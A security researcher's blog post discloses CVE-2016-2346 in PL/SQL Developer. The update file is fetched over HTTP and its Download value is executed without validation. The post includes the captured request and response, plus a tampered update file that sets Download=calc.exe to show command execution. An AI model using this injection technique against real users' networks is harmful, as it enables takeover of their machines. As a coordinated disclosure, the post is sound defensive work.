Adam Caudill

Security Leader, Researcher, Developer, Writer, & Photographer

PL/SQL Developer: HTTP to Command Execution

While looking into PL/SQL Developer – a very popular tool for working with Oracle databases, to see how it encrypts passwords I noticed something interesting. When testing Windows applications, I make it a habit to have Fiddler running, to see if there is any interesting traffic – and in this case, there certainly was.

PL/SQL Developer has an update mechanism which retrieves a file containing information about available updates to PL/SQL Developer and other components; this file is retrieved via HTTP, meaning that an attacker in a privileged network position could modify this file.

This file is retrieved each time the application starts, and if a version listed in the file is greater than the version installed, the user will be prompted to upgrade (default behavior; otherwise user not prompted until they select Help | Check Online Updates). They have the following options:

  • Update: If a URL is provided, the application will download a file (also over HTTP), and apply the update. If no URL is provided, the option is not presented to the user.
  • Download: Executes the URL provided, so that the user’s browser will open, and immediately download the file. This is typically an executable (*.exe); as is the case elsewhere, the file is retrieved over HTTP, and no validation is being performed.
  • Info: If a URL, it’s executed so that the user’s browser opens to the specified URL; otherwise content is displayed in a message box.

The are (at least) two issues here:

  • Redirect to malicious download; as the user is likely unaware that they shouldn’t trust the file downloaded as a result of using the Download option, an attacker could replace the URL and point to a malicious file, or simply leverage their privileged position to provide a malicious file at the legitimate URL.
  • Command Execution; when the user selects the Download option, the value in the file is effectively ShellExecute’d, without any validation – there is no requirement that it be a URL. If a command is inserted, it will be executed in the context of the user.

This means that a user believing that they are downloading an update, can actually be handing full control over to an attacker – this is a case where not bothering to use HTTPS to secure traffic, can provide multiple methods for an attacker to gain control of the user’s PC. This is a great example of the importance of using HTTPS for all traffic – it’s not just about privacy, it’s also critical for integrity.

The tested version of PL/SQL Developer was 11.0.4, though the issue likely well predates that version. The vendor reports that this issue has been addressed by enforcing HTTPS on their website, and application changes made in version 11.0.6. It is recommended that all users update to the latest version.

Vulnerability Note: VU#229047
CVE: CVE-2016-2346

Technical Details #

The update file is retrieved from http://www.allroundautomations.com/update/pls.updates – the request issued by the application looks like this:

GET http://www.allroundautomations.com/update/pls.updates HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.allroundautomations.com
DNT: 1
Connection: Keep-Alive

Here’s what a response looks like – it’s a INI-like file, the Download value is the item we care about most here:

HTTP/1.1 200 OK
Date: Thu, 04 Feb 2016 21:50:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Fri, 11 Sep 2015 09:10:32 GMT
ETag: "fa1816-84a-55f29a88"
Accept-Ranges: bytes
Content-Length: 2122
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/plain

date=11092015

[plsqldev.exe]

Version=11.0.4.1774
WhatsNew=http://www.allroundautomations.com/registered/pls1104.txt
Download=http://files.allroundautomations.com/plsqldev1104.exe

Update=http://files.allroundautomations.com/plsqldev1104.upd

[plsqldoc.dll]

Version=1.2.2.0

ReleaseDate=

WhatsNew=Fixed "List index out of bounds" error during document generation
Download=
http://www.allroundautomations.com/download/plsqldoc122.zip

[vcs.dll]

Version=1.2.4.0

ReleaseDate=

WhatsNew=Upgraded to work with PL/SQL Developer 9.0

Download=http://www.allroundautomations.com/download/vcs124.zip

[redgate.dll]

Version=1.1.1.134

ReleaseDate=

WhatsNew=Improved download and Installation of Red Gate products from within Plug-In
Download=http://www.allroundautomations.com/download/RedGate111.zip

[ftp.dll]

Version=2.1.0.0

ReleaseDate=

WhatsNew=New version with Timezone correction and some bugfixes.

Download=http://www.allroundautomations.com/download/ftp2.zip

[textexport.dll]

Version=1.1.0.0

ReleaseDate=

WhatsNew=New: allow columns to be included/excluded from export, allow first column (Line No) always include/exclude from export

Download=http://www.allroundautomations.com/download/textexport.zip

[activequerybuilder.dll]

Version=1.1.0.0

ReleaseDate=

WhatsNew=New: Updated for PL/SQL Developer 7.1

Download=http://www.allroundautomations.com/download/ActiveQueryBuilder.zip

[plotwindow.dll]

Version=1.1.0.0

WhatsNew=http://www.browserextender.com/forum/viewtopic.php?p=24#24

Download=http://www.browserextender.com/downloads.php?language=english#PlotWindow

[OB5.dll]

Version=

ReleaseDate=02022006

WhatsNew=http://www.orindasoft.com/public/Pages.php4?location=plsqlfeatures

Download=http://www.orindasoft.com/public/V4%20Patchestwo.php4

[QuickER.dll]

Version=2.6.0.54

WhatsNew=http://www.gotterup.net/release_notes.txt

Download=http://www.gotterup.net/quicker.exe

[QuickERPlugIn.dll]

Version=2.6.0.54

WhatsNew=http://www.gotterup.net/release_notes.txt

Download=http://www.gotterup.net/quicker.exe

By changing the returned file, replacing this line:

Download=http://files.allroundautomations.com/plsqldev1104.exe

With this:

Download=calc.exe

When the user selects the Download option, calc.exe will be executed.

Here is an example of a pls.updates file that demonstrates this flaw (the key changes are increasing the Version, so that the user will see it as an update, clearing the Update value, so the only option is Download, and setting Download to the command that you wish to be executed):

date=11122015

[plsqldev.exe]

Version=12.0.0.0
WhatsNew=http://www.allroundautomations.com/registered/pls1104.txt
Download=calc.exe
Update=

...

Special Thanks #

Thanks to Garret Wassermann of CERT/CC for his assistance and Allround Automations for addressing the issue.

Adam Caudill


Related Posts

  • PL/SQL Developer: Nonexistent Encryption

    (See here for another issue discovered during this research; Updates over HTTP & Command Execution.) PL/SQL Developer by Allround Automations has an option to store the user’s logon history with passwords – the passwords are encrypted with a proprietary algorithm. At this point, you should know how this is going to go. For those that don’t know, PL/SQL Developer is a tool for developers and database administrators to access Oracle – an essential tool in many enterprise environments.

  • Exploiting the Jackson RCE: CVE-2017-7525

    Earlier this year, a vulnerability was discovered in the Jackson data-binding library, a library for Java that allows developers to easily serialize Java objects to JSON and vice versa, that allowed an attacker to exploit deserialization to achieve Remote Code Execution on the server. This vulnerability didn’t seem to get much attention, and even less documentation. Given that this is an easily exploited Remote Code Execution vulnerability with little documentation, I’m sharing my notes on it.

  • Dovestones Software AD Self Password Reset (CVE-2015-8267)

    Software AD Self Password Reset v3.0 by Dovestones Software contains a critical vulnerability in the password change functionality, that allows unauthenticated users to change the password of arbitrary accounts. The vendor has been working with customers to upgrade them to a fixed version. The /Reset/ChangePass function doesn’t validate that the validation questions have been answered, or validate that the account in question is enrolled. This allows an attacker to reset any account that the service account is able to reset, even if they aren’t enrolled.

  • phpMyID: Fixing Abandoned OSS Software

    phpMyID is a simple solution for those that want to run their own OpenID endpoint – the problem is that its author stopped maintaining the project in 2008. Despite this, there’s still quite a few people that use it, because it’s the easiest single-user OpenID option available. Unfortunately, the author didn’t follow best practices when building the software, and as a result multiple security flaws were introduced. In 2008, a XSS was identified and never fixed (CVE-2008-4730), in the years since then it seems the software has been below the radar.

  • VICIDIAL: Multiple Vulnerabilities

    Update: The VICIDIAL team has publicly released a new version that, according to them, has corrected the issues I’ve pointed out here. Please make sure you are using the latest version available. If you aren’t sure if your instance is safe, contact your friendly local penetration tester to verify it’s secure as you expect it to be. Update: The SQL Injection vulnerability has been assigned CVE-2013-4467, and Command Injection assigned CVE-2013-4468.